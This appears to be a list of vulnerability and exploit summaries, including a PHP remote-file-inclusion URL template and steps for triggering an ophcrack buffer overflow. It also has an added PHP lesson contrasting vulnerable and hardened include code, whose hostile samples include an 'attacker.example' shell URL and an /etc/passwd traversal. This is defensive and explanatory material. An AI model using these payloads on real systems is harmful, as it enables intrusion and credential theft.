This exploit abuses a glibc bug to escalate privileges and read /etc/shadow. It targets glibc versions 2.1.9x and later.
FUSE is prone to a local information-disclosure vulnerability: the kernel module fails to clear memory before reusing it, so a local user can read leftover kernel memory that may contain sensitive data and use it to aid further attacks.
Multiple vulnerabilities in NPDS allow remote attackers to carry out HTML injection, cross-site scripting, and SQL injection attacks. These vulnerabilities can result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
This exploit lets an attacker register an account with admin privileges by luring a logged-in administrator to a page that submits a forged (CSRF) request on the administrator's behalf.
The $lib_dir variable is not sanitized. With register_globals=on, an attacker can supply it in the request and make the script include an attacker-controlled PHP file. The exploit URL is http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]
The 'header_get_field_name()' function in the 'mailbox/header.c' source file of the GNU Mailutils 'mail' utility is vulnerable to a buffer overflow. An attacker can trigger it by sending a specially crafted email to the affected software and execute arbitrary code with the privileges of the user running the affected program.
TOPo is prone to multiple cross-site scripting vulnerabilities caused by a failure to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user, which may facilitate the theft of cookie-based authentication credentials as well as other attacks.
The $templatePath variable is not sanitized. With register_globals=on, an attacker can supply it in the request and make the script include an attacker-controlled PHP file.
myBloggie is affected by multiple vulnerabilities that allow an attacker to carry out cross-site scripting, HTML injection, and SQL injection attacks, leading to theft of authentication credentials, disclosure of sensitive data, and other potential attacks. The attacker can also compromise the integrity of the site by deleting arbitrary comments.
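As an added example (not code from the affected projects), the following shows the pattern behind the $lib_dir and $templatePath findings above: a PHP script that builds an include path from a variable the attacker can set when register_globals=on, beside a hardened version that derives the base path from its own location and validates any request-chosen component. The file names, template names, default paths and the attacker host are assumptions made for the illustration.

```php
<?php
// Added illustration, not code from the affected projects: the
// register_globals file-inclusion pattern and a hardened replacement.
// Every file name, template name and default path below is an assumption.

/*
 * Vulnerable shape. With register_globals=on (removed in PHP 5.4) every
 * request parameter was injected into global scope, so a request such as
 *   GetRecord.php?lib_dir=http://attacker.example/shell.txt?
 * set $lib_dir before the include ran and the script included the
 * attacker's file. extract($get) reproduces that behaviour on a modern
 * interpreter so the flaw can be shown; it is every bit as unsafe.
 */
function vulnerable_include_target(array $get): string
{
    extract($get);                           // emulates register_globals=on
    if (!isset($lib_dir)) {
        $lib_dir = dirname(__DIR__);         // assumed default when called via the app
    }
    return $lib_dir . '/xml/oai/common.php'; // assumed included file
}

/*
 * Defence in depth for any path component that legitimately comes from the
 * request: refuse stream wrappers, absolute paths, traversal and NUL bytes.
 */
function is_safe_relative_path(string $path): bool
{
    if ($path === '' || strpos($path, "\0") !== false) {
        return false;                                   // NUL truncation tricks
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false;                                   // http://, ftp://, php://, data:// ...
    }
    if ($path[0] === '/' || $path[0] === '\\' || preg_match('#^[a-z]:#i', $path)) {
        return false;                                   // absolute paths, Windows drive letters
    }
    foreach (preg_split('#[\\\\/]+#', $path) as $segment) {
        if ($segment === '..') {
            return false;                               // directory traversal
        }
    }
    return true;
}

/*
 * Hardened shape: the base directory is fixed by the code, never read from
 * globals, and the only request-controlled piece (a template name, as with
 * $templatePath) is read explicitly, validated and matched against an
 * allow-list before it touches the file system.
 */
function hardened_include_target(array $get): string
{
    $base     = dirname(__DIR__);             // fixed by the code, not the request
    $allowed  = ['default', 'print'];         // assumed template names the app ships
    $template = $get['template'] ?? 'default';
    if (!is_safe_relative_path($template) || !in_array($template, $allowed, true)) {
        throw new InvalidArgumentException('refusing unsafe template name');
    }
    return $base . '/templates/' . $template . '.php';
}

// Constructed sample requests: one legitimate, two as an attacker would send them.
$samples = [
    'legitimate'  => ['template' => 'print'],
    'remote file' => ['lib_dir'  => 'http://attacker.example/shell.txt?',
                      'template' => 'http://attacker.example/shell.txt?'],
    'traversal'   => ['lib_dir'  => '../../../../etc/passwd' . "\0",
                      'template' => '../../etc/passwd' . "\0"],
];

foreach ($samples as $label => $get) {
    printf("%-12s vulnerable -> %s\n", $label, addcslashes(vulnerable_include_target($get), "\0"));
    try {
        printf("%-12s hardened   -> %s\n", $label, hardened_include_target($get));
    } catch (InvalidArgumentException $e) {
        printf("%-12s hardened   -> rejected (%s)\n", $label, $e->getMessage());
    }
}
```

Run it with `php example.php`: the vulnerable function happily returns the attacker's URL or a traversal path as the include target, while the hardened one only ever resolves to a file under the application's own templates directory and rejects the two hostile requests. Turning register_globals off (or running any PHP release since 5.4, where it no longer exists) removes the injection route, but the real fix is the one shown: never let request data choose where an include or require comes from.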
Stack-based buffer overflow - direct EIP overwrite in this case (SEH-based exploitation is possible as well). To exploit, go to: Load -> Remote SAM -> put the content of the buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash. pwdump6_setup.exe will be run by ophcrack. It will nicely crash and execute the payload. pwdump6_setup itself doesn't look to be exploitable outside of ophcrack. Kudos to Hostess for pointing me to http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html